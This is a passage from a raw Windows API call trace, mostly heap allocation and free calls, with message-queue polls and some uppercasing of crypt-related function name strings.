dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0204.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0204.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0204.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0204.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0204.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0204.886] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.886] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0204.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0204.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2eaa530 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0204.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2ebf630 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaa530 | out: hHeap=0x970000) returned 1 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0204.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0204.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0204.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0204.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0204.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0204.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0204.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0204.893] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0204.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0204.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0204.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0204.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.894] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0204.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0204.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0204.895] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 